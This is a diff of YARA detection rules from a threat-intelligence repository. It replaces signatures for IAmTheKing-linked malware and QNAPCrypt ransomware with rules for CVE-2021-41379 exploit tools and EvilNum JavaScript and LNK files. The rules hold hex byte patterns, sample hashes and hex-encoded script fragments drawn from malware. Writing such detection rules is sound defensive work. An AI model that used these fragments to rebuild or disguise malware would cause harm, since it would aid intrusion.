-		adversary = "IAmTheKing"
+		quality = 75
+		tags = "CVE-2021-41379, FILE"
+		hash1 = "0dcda614c0128813bf74802f0e98ffd5ec32a40f35ed42778a5ec5984b5adf47"
+		hash2 = "3c78e07924e1503be1f8785c23d0dd813f04211992cbd6a4955cd0e25c745735"
+		hash3 = "57ec6e15bcc9c79c118f97103815bd74226d4baae334142890a52fbbc5006f1b"
+		hash4 = "9d24383e50e61257c565e47ec073cbb2cd751b6f650f0d542b0643dbe6691b3c"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = "@MyScreen.jpg" fullword wide
-		$s2 = "DISPLAY" fullword wide
-		$s3 = "_invoke_watson" fullword ascii
-		$s4 = "GdipSaveImageToStream" fullword ascii
-		$s5 = { 8b 57 04 89 4d e8 8d 4d e8 51 52 e8 16 0c 00 00 85 c0 74 03 89 47 08 8b 75 e8 81 fe 00 04 00 00 77 18 56 e8 ac f9 ff ff 83 c4 04 84 c0 74 0b 8b c6 e8 9e 15 00 00 8b f4 eb 35 83 c8 ff 2b c6 83 f8 08 72 15 8d 46 08 50 ff 15 f4 30 40 00 83 c4 04 85 }
+		$s1 = { 8d 0d [2] 03 00 e8 [2] ff ff 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 ff 15 [2] 03 00 3d 24 }
+		$s2 = { 33 d2 48 8b 4d 08 ff 15 [2] 03 00 c7 45 24 00 00 00 00 48 8d 55 24 48 8b 4d 08 ff 15 [2] 03 00 48 8b 4d 08 ff 15 [2] 03 00 ff 15 [2] 03 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [2] 03 00 48 89 45 48 48 c7 45 68 00 00 00 00 4c 8d 45 68 ba ff 01 0f 00 48 8b 4d 48 ff 15 [2] 03 00 48 8b 4d 48 ff 15 [2] 03 00 48 c7 85 88 00 00 00 00 00 00 00 48 8d 85 88 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 41 b9 02 00 00 00 45 33 c0 ba ff 01 0f 00 48 8b 4d 68 ff 15 [2] 03 00 48 8b 4d 68 ff 15 [2] 03 00 41 b9 04 00 00 00 4c 8d 45 24 ba 0c 00 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 8b f8 33 c0 b9 18 00 00 00 f3 aa 48 8d 85 e0 00 00 00 48 8b f8 33 c0 b9 68 00 00 00 f3 aa c7 85 e0 00 00 00 68 00 00 00 b8 05 00 00 00 66 89 85 20 01 00 00 48 8d 05 [2] 02 00 48 89 85 f0 00 00 00 41 b8 04 01 00 00 48 8d 95 70 01 00 00 48 8d 0d [2] 02 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 89 44 24 50 48 8d 85 e0 00 00 00 48 89 44 24 48 48 c7 44 24 40 00 00 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 10 00 00 00 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 48 8d 95 70 01 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d a8 00 00 00 ff 15 [2] 03 00 48 8b 8d b0 00 00 00 ff 15 [2] 03 00 }
+		$s3 = { 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 48 8b 4d 08 ff 15 [2] 03 00 48 c7 45 48 00 00 00 00 c7 45 64 00 00 00 00 4c 8d 4d 64 45 33 c0 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 8b 45 64 48 89 85 88 04 00 00 ff 15 [2] 03 00 48 8b 8d 88 04 00 00 4c 8b c1 ba 0c 00 00 00 48 8b c8 ff 15 [2] 03 00 48 89 45 48 4c 8d 4d 64 44 8b 45 64 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 48 8b 45 48 4c 8b 40 10 ba 04 01 00 00 48 8d 8d 90 00 00 00 ff 15 [2] 03 00 ff 15 [2] 03 00 4c 8b 45 48 33 d2 48 8b c8 ff 15 [2] 03 00 48 8b 4d 28 ff 15 [2] 03 00 c7 85 b4 02 00 00 01 00 00 00 c7 85 d4 02 00 00 00 00 00 }
+		$s4 = { 68 00 00 00 80 6a 00 6a 00 ff 15 24 f0 43 00 3b f4 e8 bf 5b ff ff 89 45 f8 8b f4 6a 01 68 34 84 43 00 8b 45 f8 50 ff 15 20 f0 43 00 3b f4 e8 a2 5b ff ff 89 45 ec 8b f4 ff 15 2c f1 43 00 3b f4 e8 90 5b ff ff 3d 24 }
+		$s5 = { f3 ab a1 0c d0 43 00 33 c5 89 45 fc b9 d9 10 44 00 e8 55 9c ff ff 8b 45 08 89 45 f4 b9 0c 00 00 00 be a4 7e 43 00 8d bd ec f7 ff ff f3 a5 68 d0 07 00 00 6a 00 8d 85 1c f8 ff ff 50 e8 bd 95 ff }
+		$s6 = { 8b f4 6a 00 8b 45 f4 50 ff 15 88 f0 43 00 3b f4 e8 8d 67 ff ff c7 45 e8 00 00 00 00 8b f4 8d 45 e8 50 8b 4d f4 51 ff 15 c8 f0 43 00 3b f4 e8 6f 67 ff ff 8b f4 8b 45 f4 50 ff 15 30 f1 43 00 3b f4 e8 5c 67 ff ff 8b f4 ff 15 a4 f0 43 00 3b f4 e8 4d 67 ff ff 8b f4 50 6a 00 68 00 10 10 00 ff 15 b8 f0 43 00 3b f4 e8 36 67 ff ff 89 45 dc c7 45 d0 00 00 00 00 8b f4 8d 45 d0 50 68 ff 01 0f 00 8b 4d dc 51 ff 15 3c f0 43 00 3b f4 e8 10 67 ff ff 8b f4 8b 45 dc 50 ff 15 30 f1 43 00 3b f4 e8 fd 66 ff ff c7 45 c4 00 00 00 00 8b f4 8d 45 c4 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 8b 4d d0 51 ff 15 38 f0 43 00 3b f4 e8 d4 66 ff ff 8b f4 8b 45 d0 50 ff 15 30 f1 43 00 3b f4 e8 c1 66 ff ff 8b f4 6a 04 8d 45 e8 50 6a 0c 8b 4d c4 51 ff 15 2c f0 43 00 3b f4 e8 a6 66 ff ff 33 c0 89 45 ac 89 45 b0 89 45 b4 89 45 b8 6a 44 6a 00 8d 85 60 ff ff ff 50 e8 36 63 ff ff 83 c4 0c c7 85 60 ff ff ff 44 00 00 00 b8 05 00 00 00 66 89 45 90 c7 85 68 ff ff ff a0 86 43 00 8b f4 68 04 01 00 00 8d 85 50 fd ff ff 50 68 c8 86 43 00 ff 15 58 f1 43 00 3b f4 e8 48 66 ff ff 8b f4 8d 45 ac 50 8d 8d }
+		$s7 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 b8 78 00 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 7e 4e 00 00 48 8b d9 33 d2 0f 10 0d 82 4e 00 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 7b 4e 00 00 0f 29 4c 24 30 0f 29 44 24 40 e8 da 42 00 00 4c 8b 03 48 8d 4c 24 20 ba 00 04 00 00 e8 6a f8 ff ff 33 d2 8d 4a 02 ff 15 77 4c 00 00 48 8b 4b 08 48 8d 54 24 20 ff 15 70 4c 00 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 de 34 00 00 48 81 c4 30 08 00 00 }
+		$s8 = { 33 d2 48 8b cb ff 15 c6 2c 00 00 83 65 00 00 48 8d 55 00 48 8b cb ff 15 85 2c 00 00 48 8b cb ff 15 1c 2d 00 00 ff 15 86 2c 00 00 33 d2 b9 00 10 10 00 44 8b c0 ff 15 46 2c 00 00 48 83 64 24 68 00 4c 8d 44 24 68 48 8b c8 ba ff 01 0f 00 48 8b d8 ff 15 82 2b 00 00 48 8b cb ff 15 e1 2c 00 00 48 8b 4c 24 68 48 8d 44 24 60 48 83 64 24 60 00 41 b9 02 00 00 00 48 89 44 24 28 45 33 c0 ba ff 01 0f 00 c7 44 24 20 01 00 00 00 ff 15 80 2b 00 00 48 8b 4c 24 68 ff 15 a5 2c 00 00 48 8b 4c 24 60 4c 8d 45 00 41 b9 04 00 00 00 41 8d 51 08 ff 15 1c 2b 00 00 33 c0 48 8d 4d 90 0f 57 c0 48 89 45 80 33 d2 0f 11 44 24 70 8d 58 68 44 8b c3 e8 5b 25 00 00 8d 43 9d 89 5d 90 66 89 45 d0 48 8d 55 10 48 8d 05 e0 33 00 00 41 b8 04 01 00 00 48 8d 0d f3 33 00 00 48 89 45 a0 ff 15 91 2c 00 00 48 8b 4c 24 60 48 8d 44 24 70 48 89 44 24 50 48 8d 55 10 48 8d 45 90 45 33 c9 48 89 44 24 48 45 33 c0 48 83 64 24 40 00 48 83 64 24 38 00 c7 44 24 30 10 00 00 00 83 64 24 28 00 48 83 64 24 20 00 ff 15 9a 2a 00 00 48 8b 4c 24 60 ff 15 ef 2b 00 00 48 8b 4c 24 70 ff 15 e4 2b 00 00 48 8b 4c 24 78 ff 15 d9 }
+		$s9 = { 33 d2 33 c9 41 b8 00 00 00 80 ff 15 ba 33 00 00 41 b8 01 00 00 00 48 8d 15 7d 3b 00 00 48 8b c8 48 8b d8 ff 15 d9 33 00 00 48 8b cb 48 8b f8 ff 15 8d 33 00 00 4c 8d 4c 24 20 89 74 24 20 45 33 c0 33 d2 48 8b cf ff 15 ae 33 00 00 8b 5c 24 20 ff 15 64 34 00 00 44 8b c3 ba 0c 00 00 00 48 8b c8 ff 15 33 34 00 00 44 8b 44 24 20 4c 8d 4c 24 20 48 8b d0 48 8b cf 48 8b d8 ff 15 7a 33 00 00 4c 8b 43 10 48 8d 4c 24 30 ba 04 01 00 00 ff 15 46 37 00 00 ff 15 20 34 00 00 4c 8b c3 33 d2 48 8b c8 ff 15 9a 33 00 00 48 8b cf ff 15 11 33 00 00 48 8d 4c 24 30 8b fe ff 15 a4 33 00 00 83 e8 02 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( filesize > 8KB and filesize < 60KB ) and 4 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_2 : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detect PowerPool malware"
+		description = "Detect exploit tool using CVE-2021-41379 (variant 2)"
 		author = "Arkbird_SOLG"
-		id = "8248300e-fc3e-56df-be4a-f1850e2bedc8"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_1.yara#L1-L29"
+		id = "29fe9a9c-5180-55c8-882b-ad18981dc011"
+		date = "2021-11-26"
+		modified = "2021-11-29"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_2.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "0978a6cd60533ffda0c2b13ea98dc1ba46a464890b895cb2704804a763756fca"
+		logic_hash = "28b1d0d6c0ee14cd46b12763692f4f76020cd5ad74bb2b39b61f493b98486068"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		hash1 = "9c08136b26ee5234c61a5d9e5a17afb15da35efc66514d2df5b53178693644c5"
-		hash2 = "23e7e0bbc36d523daa8e3cd8e32618c6c1fb61e32f664756e77d7917b3b11644"
-		hash3 = "e30d32cc40ad19add7dfdcbed960d5f074ea632b796ae975b75eb25455b66bb0"
-		hash4 = "88e7813340194acc4b094fd48ecf665a12d19245b90f2a69dab5861982ca95f6"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		quality = 75
+		tags = "CVE-2021-41379, FILE"
+		hash1 = "13fe508e7efb50378eb8e0225221283756bf482d51be7837f850ef2b7f3281f0"
+		hash2 = "402722d95d468ddef049e1079c882bb9a316841b9695a15783fc23bbd3b33aed"
+		hash3 = "d025564e6dc872cff32f2295e0b5a2d8e3a21fbef1957facb69a493fa8a995fb"
+		hash4 = "dc65cd6311fd764a89d0761932bef61a89fd979510bd9ff23cde8c001de316b8"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
-		$s2 = "Set Option failed errcode: %ld" fullword ascii
-		$s3 = { 68 96 00 00 00 68 ?? c4 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 ?? c5 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 [2] 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 [2] fe ff 59 c3 83 3d ?? 4c 45 00 00 74 38 53 6a 01 b8 ?? 4c 45 00 e8 ?? a0 fc ff 50 6a 00 b9 ?? 4c 45 00 e8 [2] fb ff 6a ff bb 01 00 00 00 b8 ?? 4c 45 00 e8 [2] fc ff 40 50 b9 ?? 4c 45 00 e8 [2] fb ff 5b 33 c0 6a ff 50 68 ?? 4c 45 00 }
-		$s4 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 }
-		$s5 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 2d 2d 4d 55 4c 54 49 2d 50 41 52 54 53 2d 46 4f 52 4d 2d 44 41 54 41 2d 42 4f 55 4e 44 41 52 59 0d 0a }
-		$s6 = { 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 0d 0a 0d 0a }
-		$s7 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a }
-		$s8 = { 25 73 3b 74 79 70 65 3d 25 73 3b 6c 65 6e 67 74 68 3d 25 73 3b 72 65 61 6c 64 61 74 61 3d 25 73 65 6e 64 }
+		$s1 = { 4c 89 6c 24 38 44 89 6c 24 30 44 89 6c 24 28 44 89 6c 24 20 [1-2] 01 00 00 00 ?? 8b ?? 45 33 c0 ba 03 00 08 00 48 8d 0d [3] 00 ff 15 [3] 00 48 8b d8 48 83 f8 ff 0f 84 ?? 01 00 00 33 d2 48 8b c8 ff 15 [3] 00 44 89 6d 10 48 8d 55 10 48 8b cb ff 15 [3] 00 48 8b cb ff 15 [3] 00 ff 15 [3] 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [3] 00 48 8b d8 4c 89 }
+		$s2 = { 4c 89 6c 24 30 c7 44 24 28 80 00 00 04 c7 44 24 20 04 00 00 00 45 33 c9 [1-2] 01 00 00 00 ?? 8b ?? ba 00 00 01 80 48 8d 4d 20 ff 15 [3] 00 48 89 05 [3] 00 44 89 6d 14 48 8d 45 14 48 89 44 24 28 44 89 6c 24 20 45 33 c9 4c 8d 05 [2] ff ff 33 d2 33 c9 ff 15 [3] 00 48 8b d8 ?? 8b ?? ba 04 01 00 00 49 8d ?? 10 02 00 00 [4] 00 }
+		$s3 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 [3] 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 [3] 00 48 8b d9 33 d2 0f 10 0d [3] 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 [3] 00 0f 29 4c 24 30 0f 29 44 24 40 e8 [2] 00 00 4c 8b 0b 48 8d 44 24 20 41 b8 00 04 00 00 41 8b c8 66 83 38 00 74 0a 48 83 c0 02 48 83 e9 01 75 f0 45 33 d2 49 8b c0 48 2b c1 48 85 c9 49 0f 44 c2 74 47 4c 2b c0 48 8d 44 44 20 74 2e b9 fe ff ff 7f 4c 2b c8 0f 1f 80 00 00 00 00 48 85 c9 74 1a 41 0f b7 14 01 66 85 d2 74 10 66 89 10 48 ff c9 48 83 c0 02 49 83 e8 01 75 e1 4d 85 c0 48 8d 50 fe 48 0f 45 d0 66 44 89 12 33 d2 8d 4a 02 ff 15 [3] 00 48 8b 4b 08 48 8d 54 24 20 ff 15 [3] 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 [2] 00 00 48 81 c4 30 08 00 00 5b }
+		$s4 = { 48 8b c8 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8b c8 41 b8 04 01 00 00 48 8d 95 30 02 00 00 ff 15 [3] 00 e8 [2] ff ff 48 8b d0 45 33 c0 48 8d 8d 30 02 00 00 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Kingofhearts_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_1 : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detect KingOfHearts malware"
+		description = "Detect exploit tool using CVE-2021-41379"
 		author = "Arkbird_SOLG"
-		id = "b1efb4db-3864-5fdc-a3a0-992734eaf22f"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_KingOfHearts_Jul_2021_1.yara#L1-L21"
+		id = "616e697d-0c62-58bb-9f37-29670a09d886"
+		date = "2021-11-26"
+		modified = "2021-11-29"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1463414554004709384"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "6761958760997030693c832c75098890b0d6d34fd6fe9c60d68d611497d57419"
+		logic_hash = "5514ab8f95a5d82453407dd506d55eaf1a0aa22f5ce6a5fb18501ef41645305a"
 		score = 75
-		quality = 50
-		tags = "FILE"
-		hash1 = "0639e8f5e517c3f57d28bfd9f51cabfb275c64b7bca224656c2ac04f5a8c3af0"
-		hash2 = "0340a90ed4000e579c29f6ad7d4ab2ae1d30f18a2e777689e3e576862efbd6e0"
-		hash3 = "393ccb9853ea7628792e4dd982c2dd52dd8f768fdb7b80b20cbfc2fac4e298a4"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		quality = 75
+		tags = "CVE-2021-41379, FILE"
+		hash1 = "5d97d3035b2ec1bd16016922899350693cae5f7a3be6cadbe0da34fbfd14b612"
+		hash2 = "76fe99189fa84e28dd346b1105da77c4dfd3f7f16478b05bfca4c13a75d9fd07"
+		hash3 = "9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd"
+		hash4 = "a018545b334dc2a0e0c437789a339c608852fa1cedcc88be9713806b0855faea"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = { 43 00 72 00 65 00 61 00 74 00 65 00 44 00 6f 00 77 00 6e 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 46 00 61 00 69 00 6c 00 65 00 64 00 2c 00 45 00 72 00 72 00 6f 00 72 00 3d 00 25 00 64 }
-		$s2 = { 43 00 72 00 65 00 61 00 74 00 65 00 55 00 70 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 }
-		$s3 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
-		$s4 = "\\1-driver-vmsrvc" fullword ascii
-		$s5 = { 73 74 61 72 74 20 64 6f 77 6e 3a 20 25 73 0a }
-		$s6 = { 66 00 69 00 6c 00 65 00 20 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 22 00 25 00 73 00 22 }
+		$s1 = { 50 6a 01 50 68 03 00 08 00 68 [3] 00 ff 15 [3] 00 8b f0 83 fe ff 0f 84 [2] 00 00 6a 00 56 ff 15 88 [2] 00 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 56 ff 15 [3] 00 8b 3d [3] 00 56 ff d7 ff 15 [3] 00 50 6a 00 68 00 10 10 00 ff 15 [3] 00 8b f0 c7 85 ?? fb ff ff 00 00 00 00 8d 85 ?? fb ff ff 50 68 ff 01 0f 00 56 ff 15 [3] 00 56 ff d7 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 6a 04 8d 85 ?? fb ff ff 50 6a 0c ff b5 ?? fb ff ff ff 15 08 [2] 00 6a 44 8d 85 78 fb ff ff 0f 57 c0 6a 00 50 0f 11 85 bc fb ff ff e8 [2] 00 00 83 c4 0c c7 85 78 fb ff ff 44 00 00 00 b8 05 00 00 00 c7 85 80 fb ff ff [3] 00 66 89 85 a8 fb ff ff 8d 85 e8 fd ff ff 68 04 01 00 00 50 68 [3] 00 ff 15 [3] 00 8d 85 bc fb ff ff 50 8d 85 78 fb ff ff 50 6a 00 6a 00 6a 10 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 ff b5 bc fb ff ff ff d7 ff b5 c0 fb ff ff ff d7 }
+		$s2 = { 6a 00 68 80 00 00 04 6a 04 6a 00 6a 01 68 00 00 01 80 8d 85 e8 fd ff ff 50 ff 15 [3] 00 8b 35 [3] 00 a3 [3] 00 8d 85 d8 fb ff ff 50 6a 00 6a 00 68 [2] 40 00 6a 00 6a 00 c7 85 d8 fb ff ff 00 00 00 00 ff d6 8b f8 8b 85 dc fb ff ff 68 [3] 00 05 0c 02 00 00 68 04 01 00 00 50 }
+		$s3 = { 55 8b ec 81 ec 04 08 00 00 a1 04 [2] 00 33 c5 89 45 fc 0f 10 05 [3] 00 ?? 8b ?? 08 8d 85 2c f8 ff ff [0-1] 0f 11 85 fc f7 ff ff [1-5] 0f 10 05 [3] 00 [3-8] 0f 11 85 0c f8 ff ff [0-1] 0f 10 05 }
+		$s4 = { 50 ff ?? 68 04 01 00 00 8d 85 e0 fb ff ff 50 6a 00 ff 15 [3] 00 50 ff 15 [3] 00 6a 00 e8 [2] ff ff 50 8d 85 e0 fb ff ff 50 ff 15 84 [2] 00 6a 00 ff 15 [3] 00 8d 85 ?? fb ff ff 50 68 [3] 00 6a 04 6a 00 68 [3] 00 ff 15 [3] 00 ff 15 [3] 00 8b 35 [3] 00 8b 3d [3] 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 35KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Queenofhearts_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Evilnum_JS_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect QueenOfHearts malware"
+		description = "Detect JS script used by EvilNum group"
 		author = "Arkbird_SOLG"
-		id = "763b35dd-6515-5ae8-a539-200a3647f074"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfHearts_Jul_2021_1.yara#L1-L23"
+		id = "08b410c4-4899-5280-9735-6b3017c7a813"
+		date = "2020-07-13"
+		modified = "2021-07-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_JS_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "51cb8efddbc635e9a54f58a799e6edcf8eda8ca451ebe85cbce5f6cd20bfb083"
+		logic_hash = "0ace40e54f6dca078f17e7e157c7973642b83366ba792d2bcdc0d971f729fb68"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
-		hash1 = "44eb620879e0c3f80ff95fda5b1e301d471b59e47c4002132df646acfc7cc5ba"
-		hash2 = "a63600e5c28a4c1770a53d310ff017abd3cb9c20cb58a85d53df0c06bcae1864"
-		hash3 = "f110ebee387c2dfac08beb674a8efec20940bc562c5231e9bb4a90296476c29f"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "8420577149bef1eb12387be3ea7c33f70272e457891dfe08fdb015ba7cd92c72"
+		hash2 = "c16824a585c9a77332fc16357b5e00fc110c00535480e9495c627f656bb60f24"
+		hash3 = "1061baf604aaa7ed5ba3026b9367de7b6c7f20e7e706d9e9b5308c45a64b2679"
+		tlp = "white"
+		adversary = "EvilNum"
 
 	strings:
-		$s1 = "send request error:%d" fullword ascii
-		$s2 = "cookie size :%d" fullword wide
-		$s3 = "querycode error" fullword wide
-		$s4 = { 7b 27 73 65 73 73 69 6f 6e 27 3a 5b 7b 27 6e 61 6d 65 27 3a 27 [1-10] 27 2c 27 69 64 27 3a [1-6] 2c 27 74 69 6d 65 27 3a [3-10] 7d 5d 2c 27 6a 70 67 27 3a }
-		$s5 = "PmMytex%d" fullword wide
-		$s6 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 4c 00 65 00 6e 00 67 00 74 00 68 00 3a 00 20 00 25 00 49 00 36 00 34 00 75 00 0d 00 0a }
-		$s7 = { 25 00 73 00 5c 00 25 00 73 00 2e 00 6c 00 6f 00 67 }
-		$s8 = { 25 00 73 00 5f 00 25 00 63 00 25 00 63 00 25 00 63 00 25 00 63 00 5f 00 25 00 64 }
+		$s1 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
+		$s2 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
+		$s3 = { 69 66 20 28 2d 31 20 21 3d 20 57 53 63 72 69 70 74 2e 53 63 72 69 70 74 46 75 6c 6c 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 [1-8] 28 22 }
+		$s4 = { 52 75 6e 28 [1-8] 30 2c 20 30 29 }
+		$s5 = { 7d 2c 20 ?? 20 3d 20 ?? 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 2c 20 31 20 2b 20 ?? 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 20 2b 20 ?? 20 2b 20 34 29 2c 20 ?? 20 3d 20 5b 5d 2c }
+		$s6 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 41 44 4f 44 42 2e 53 74 72 65 61 6d 22 29 3b }
+		$s7 = { 5b ?? 5d 20 3d 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 54 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 3b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
+		filesize > 8KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Evilnum_LNK_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect QNAPCrypt ransomware (x86 version)"
+		description = "Detect LNK file used by EvilNum group"
 		author = "Arkbird_SOLG"
-		id = "fcdec43a-de70-57a2-9527-263685acc820"
-		date = "2021-08-11"
-		modified = "2021-08-12"
-		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_1.yara#L1-L29"
+		id = "9d570c02-606a-5bff-af7a-9b5ef1e6df90"
+		date = "2020-07-13"
+		modified = "2021-07-14"
